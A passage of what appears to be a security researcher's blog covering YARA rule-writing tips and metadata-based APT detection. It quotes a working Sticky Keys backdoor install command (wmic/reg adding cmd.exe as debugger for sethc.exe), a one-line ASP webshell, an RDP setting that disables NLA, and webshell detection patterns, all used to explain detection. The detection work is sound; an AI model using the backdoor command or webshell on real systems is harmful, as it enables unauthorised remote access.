        uint16(0) == 0x5A4D and filesize < 50000 and 1 of ($x*) and 6 of ($s*)
}

If you can’t create a rule that is sufficiently specific, I recommend the following methods to restrict the rule (a combined sketch follows after the list):

  • Magic Header (use it as first element in condition – see performance guidelines, e.g. “uint16(0) == 0x5A4D”)
  • File Size (malware that mimics valid system files, drivers or legitimate software often differs significantly in size; try to find the valid files online and set a size value in your rule, e.g. “filesize > 200KB and filesize < 600KB")
  • String Location (see the “Location is Everything” section)
  • Exclude strings that occur in false positives (e.g. $fp1 = “McAfeeSig”)
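
A minimal sketch that combines these restrictions (the $s strings are the example strings mentioned above, everything else is illustrative):

rule Example_Restricted_Rule {
    meta:
        description = "Sketch only - combines magic header, file size and a false positive filter string"
    strings:
        $s1 = "wwwlib.dll" fullword ascii        /* suspicious example strings */
        $s2 = "&PassWord=" ascii
        $s3 = "User-Agent: Mozilla" ascii
        $fp1 = "McAfeeSig" ascii                 /* known false positive marker */
    condition:
        uint16(0) == 0x5A4D and filesize > 200KB and filesize < 600KB
        and all of ($s*) and not 1 of ($fp*)
}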

Location is Everything

One of the most underestimated features of Yara is the possibility to define a range in which strings have to occur in order to match. I used this technique to create a rule that detects Metasploit Meterpreter payloads quite reliably, even if they are encoded/cloaked. How is that possible?
If you see malware code that is hidden in an overlay at the end of a valid executable (e.g. “ab.exe”) and you only see strings that are typical function exports or that mimic a well-known executable, ask the following questions:

  • Is it normal that these strings are located at this location in the file?
  • Is it normal that these strings occur more than once in that file?
  • Is the distance between two strings somehow specific?

Malware Strings

In case of the unspecific malware code in the PE overlay, try to define a rule that looks for a certain file size (e.g. filesize > 800KB) and the malware strings relative to the end of the file (e.g. $s1 in (filesize-500..filesize)).
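
A sketch of such an overlay rule could look like this (the string is only an illustrative placeholder):

rule SUSP_PE_Overlay_Payload_Sketch {
    meta:
        description = "Sketch only - unspecific payload string close to the end of a large PE file"
        score = 50
    strings:
        $s1 = "ReflectiveLoader" ascii    /* placeholder - use strings actually seen in the overlay */
    condition:
        uint16(0) == 0x5a4d and filesize > 800KB
        and $s1 in (filesize-500..filesize)
}
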
The following example shows an unspecific webshell that contains strings that may be modified by an attacker in future versions when applied in a victim’s network. Always try to extract strings that are less likely to be changed.
Webshell Code PHP

The variable name “$code” is more likely to change than the function combination “@eval(gzinflate(base64_decode(” at the end of the file. It is possible that valid php code contains “eval(gzinflate(base64_decode(” somewhere in the code but it is less likely that it occurs in the last 50 bytes of the file.
I therefore wrote the following rule:

rule Webshell_b374k_related_1 {
    meta:
        description = "Detects b374k related webshell"
        author = "Florian Roth"
        reference = "https://goo.gl/ZuzV2S"
        score = 65
        hash = "d5696b32d32177cf70eaaa5a28d1c5823526d87e20d3c62b747517c6d41656f7"
        date = "2015-10-17"
    strings:
        $m1 = "<?php"
        $s1 = "@eval(gzinflate(base64_decode(" ascii
    condition:
        $m1 at 0 and $s1 in (filesize-50..filesize) and filesize < 20KB
}

Performance Guidelines

I collected many ideas by Wesley Shields and Victor M. Alvarez and composed a gist called “Yara Performance Guidelines”. This guide shows you how to write Yara rules that use fewer CPU cycles by avoiding CPU intensive checks and by using new condition checking shortcuts introduced in Yara version 3.4.
Yara Performance Guidelines

PE Module

People sometimes ask why I don’t use the PE module. The reason is simple: I avoid using modules that are rather new and would like to see them thoroughly tested prior to using them in my scanners running in production environments. It is a great module and a lot of effort went into it. I would always recommend using the PE module in lab environments or sandboxes. In scanners that walk huge directory trees, a minor memory leak in one of the modules could lead to severe memory shortages. I’ll give it another year to prove its stability and then start using it in my rules.

yarGen

yarGen has had an opcode feature since the last minor version. It is active by default but only useful in cases in which not enough strings could be extracted.
I currently use the following parameters to create my rules:

python yarGen.py --noop -z 0 -a "Florian Roth" -r "http://link-to-sample" /mal/malware

The problem with the opcode feature is that it requires about 2.5 GB more main memory during rule creation. I’ll change it to an optional parameter in the next version.

yarAnalyzer

yarAnalyzer is a rather new tool that focuses on rule coverage. After creating a bigger rule set or a generic rule that should match on several samples you’d like to check the coverage of your rules in order to detect overlapping rules (which is often OK).
yarAnalyzer helps you to get an overview on:

  • rules that match on more than one sample
  • samples that show hits from more than one rule
  • rules without hits
  • samples without hits

yarAnalyzer Screenshot


yarAnalyzer Github Repository

String Extraction and Colorization

To review the strings in a sample I use a simple shell one-liner that a good friend sent me once.
“strings” version for Linux

#!/bin/bash
(strings -a -td "$@" | sed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 A \2/' ; strings -a -td -el "$@" | sed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 W \2/') | sort -n

“gstrings” version for OS X (sudo port install binutils)

#!/bin/bash
(gstrings -a -td "$@" | gsed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 A \2/' ; gstrings -a -td -el "$@" | gsed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 W \2/') | sort -n

It produces output as shown in the screenshot above (“Malware Strings”, green text), listing the offset, the string type – ascii (A) or wide (W) – and the string at this offset.
For a colorization of the strings output, check my new tool “prisma”, which colorizes arbitrary standard output.

Prisma STDOUT colorization

Contact

Follow me on Twitter: @Cyb3rOps

APT Detection is About Metadata

People often ask me why we changed the name of our scanner from “IOC” to “APT” scanner and if we did that only for marketing reasons. Don’t worry, this blog post is just as little a sales pitch as it is an attempt to create a new product class.
I’ll show you why APT detection is difficult – for the big players and spirited newcomers like us.

Metadata is the Key

Only recently did I recognize and name the methods that we have applied since we introduced the scoring system in our scanner product. Instead of looking at a file only by its content, we collect numerous attributes and calculate a score based on certain rules that indicate conspicuous features or anomalies.
What I recognized was that Metadata is the key to successful APT detection. Let me give you some examples.

The “Sticky Keys” Backdoor

During our investigations we found that the attackers used a simple backdoor that allowed them to avoid AV detection and use tools that were already available on the target systems. What they did was copy a valid “cmd.exe” over the “sethc.exe” in the System32 folder in order to establish a backdoor that waits for the user to press shift five times consecutively on an RDP logon screen and then pops up a Windows command line running as LOCAL_SYSTEM. Another method sets the Windows command line as debugger for the stickykeys binary.

wmic /user:username /password:secret /node:system1 process call create
"C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f"

With the necessary rights it is easy to install and difficult to detect.

StickyKeys Backdoor APT

As I already said, an Antivirus engine won’t detect this backdoor, as the content of the file is a valid Windows executable with an intact signature. Windows 7+ users won’t stumble over it as they have Network Level Authentication (NLA) enabled by default, which prompts the user for username and password before fully establishing a Terminal Services connection. Attackers modify their local “default.rdp” file and add “enablecredsspsupport:i:0” in order to disable this behaviour.
APT detection therefore means the following:

  • Check system files like the stickykeys binary for modifications – not by comparing MD5 hashes from whitelist databases like the NSRL, but by comparing the expected content for a certain file name with the actual content of the file (see the sketch after this list). I described this method in a blog article and Chad Tilbury from CrowdStrike described how to apply this method using their CrowdResponse tool.
  • Identify “default.rdp” files on server systems that have NLA disabled. (Administrators shouldn’t do that)
  • Check if the Windows command line (cmd.exe) is registered as a debugger for any program
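
Picking up the first check, a minimal sketch of such a content-expectation rule – assuming a scanner like LOKI or THOR that passes the external variable “filename” – could look like this:

rule SUSP_Replaced_SethcExe_Sketch {
    meta:
        description = "Sketch only - sethc.exe that lacks the expected StickyKeys string (requires the external variable 'filename')"
        score = 60
    strings:
        $expected = "stickykeys" ascii wide nocase
    condition:
        uint16(0) == 0x5a4d and filename == "sethc.exe" and not $expected
}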

PsExec’s Evil Clone

I often use the example of the well-known Sysinternals tool “PsExec”, which is likewise used by administrators and APT groups. It doesn’t make much sense adding it to the indicators of compromise (IOCs) of your triage sweep although it may have played a substantial role in lateral attacker movement.
The human eye is able to distinguish between a PsExec that has been used for administration and a PsExec that has been used by the attackers. The essential difference, which enables us to distinguish between both versions, does not lie in the content of the file but in the metadata.
Look at the following table and tell me which of the two files is valid and which has been placed on the system by the attackers. Remember, the file content is the same – the MD5 hashes of both files are equal.

                     File 1                            File 2
MD5                  aeee996fd3484f28e5cd85fe26b6bdcd  aeee996fd3484f28e5cd85fe26b6bdcd
Filename             PsExec.exe                        p.exe
Path                 C:\SysInternals                   C:\TEMP
Owner                Administrators                    LOCAL_SYSTEM
Modified Time Stamp  2013-02-10 09:22:04               1970-01-01 00:00:00

It is not that difficult, is it?
APT detection therefore means the following:

  • Imitating the human point of view by pulling together all metadata connected with an element – be it a file, a process or an eventlog message – and evaluating the legitimacy of the element based on all available metadata attributes

The Simplest Webshell

We often encounter so-called webshells that were placed in web server directories to establish a simple backdoor. Webshells can be very specific and therefore easy to detect. The C99 webshell is a good example for a PHP webshell, JspSpy is a well-known JSP webshell. Both are easily detected, even by Antivirus engines (see: C99 on VT, JSPSpy on VT).
However, APT groups tend to use two different types of webshells:

  • Tiny webshells
  • Code snippets with certain functions copied from legitimate software

There are a lot of well-known tiny webshells. The following one is my favorite. Add a space or change the request parameter “abc” to something else and the detection ratio is alarmingly low (Example). It allows an attacker to evaluate (execute) an arbitrary command on the web server. There are numerous blog posts and other articles describing what can be done with a webshell like this. However, the protection level provided by AV engines, firewalls and NIDS is almost zero.

<%eval request("abc")%>

Another method we discovered was the use of code snippets copied from blog entries or tutorial pages that allowed them to use only certain functions like “file upload” or “directory listing”.
They often use a weakness in web applications to upload and run their own scripts or even whole application containers (.war). By placing a known webshell like the JspSpy webshell into that web server folder, they would run the risk of being detected. What they really need is a distribution point for their toolset or a simple tool to execute code on the server (like a tiny webshell). We’ve seen simple upload scripts that provide nothing more than an upload function, which they use to store their toolsets for lateral movement. A Google search for “upload jsp” revealed various scripts they used in their attacks. It’s obvious that AV engines won’t detect this type of threat. How could they? The attackers abuse benign pieces of code to establish malicious backdoors.
APT detection therefore means the following:

  • Use metadata like file size, creation timestamp and file extension in combination with generic content detection rules – e.g. check for the string “eval” in a file smaller than 40 bytes that has a script extension like “.jsp” (see the sketch after this list).
  • Check the content of upload directories for the expected file types (and don’t use the extension to determine the file type)
  • Check web server processes for executables running in the web server directories – e.g. curl.exe in D:\Inetpub\wwwroot
  • Generate and send frequent reports on modified files within the web server directories

The Heavy Burden of Definite Detection

One could be tempted to believe that I wrote this article in order to degrade Antivirus engines, but this isn’t the case. Antivirus solutions still play a key role and carry the heavy burden of definite detection. Their scan result has to be “thumbs up” or “thumbs down” as there is no middle ground.
Years ago they introduced signatures to detect “Potentially Unwanted Applications” (PUA). Users or administrators decide on what to do if one of these “dual use” tools has been found on a system. Handling thousands of the events generated by the Antivirus agents is a difficult task, even with a central console or SIEM integrated log files. It is easy to understand why PUA events do not play an important role in view of dozens of Trojan detections per day.

APT detection is the art of suspicion. A missing “stickykeys” string in the “sethc.exe” indicates a manipulation, a replaced system file. It is not a definite detection but the certainty that something is wrong.

Conclusion

Considering the given examples an attentive reader may be inclined to believe that Antivirus and simple IOC scanning (Triage) is not enough to defend against Advanced Persistent Threats. After the experiences of the last 3 years I have to confirm that assumption.
Who would recognize and report the execution of a “sethc.exe” on a server system, the “PUA/PsExec” message generated by the Antivirus or another JSP file on the web server?
I even doubt that so-called “APT solutions” are able to detect

  • a “.war”-file upload to a Tomcat server by the use of “tomcat/tomcat” as credentials,
  • encrypted file uploads,
  • lateral movement using PsExec, Powershell or WMIC and
  • “StickyKey” backdoor access via RDP.

An extensive security monitoring in form of a SIEM system allows you to detect a needle in the haystack but only if you are able to distinguish between straw and needles.

The question is: How can I define such soft indicators to detect the described anomalies? The OpenIOC framework already contains options to combine certain characteristics like filename and filesize, but rather than using it as a tool to describe anomalies it is often used to tighten the detection to the level of a hash value. I prefer hash values over “Name:PsExec.exe” combined with “Filesize:381816” because it doesn’t make you believe that you’re looking at a clever rule.
I therefore recommend the following:

  1. Assume compromise and start from there
    Ask yourself: How would I detect a breach? What if attackers already took control of the Windows Domain and worked with domain admin accounts? What if they worked with tools that my Antivirus is unable to detect?
  2. Use all Metadata you can get to determine the legitimacy of an element
    This does not only apply to files or processes in APT and IOC scanning, but also to the discipline of security monitoring. E.g. select interesting Antivirus events based on various characteristics and not only on the status that indicates whether the malware has been removed or not. Consider the location of the malware (Temporary Internet Files or System32 folder), the user account (restricted user, Administrator or LOCAL_SYSTEM), the malware type (JS/Redirector or PUA/PasswordDump), the system type (server or client workstation), the detection time (02:00am with no one working in the night shift), the detected form (in a RAR archive or extracted). Develop similar schemes for other log types. The most interesting ones are Antivirus, Proxy and Windows logs.
    Useful Links:
    SysForensics published an article about process anomaly detection, which was adapted to other OS versions and included in our THOR APT Scanner and my LOKI IOC Scanner.
    Use SysInternals Sysmon to enrich your Windows log data.
  3. Don’t create detection rules that are too tight but concentrate on filtering the false positives
    If you regard filtering false positives as a pain in the neck you’re probably using the wrong SIEM system. (Warning – product placement: I prefer Splunk over all others, especially with the Enterprise Security App installed)
  4. Use IOCs from published APT reports to enrich your detection rules
    We use the APT reports to create new rules in our customers’ SIEM systems and as input for our APT scanner THOR. Useful Links:
    APT Notes is an IOC repository with hundreds of reports from the last years. You can download the github repository from here.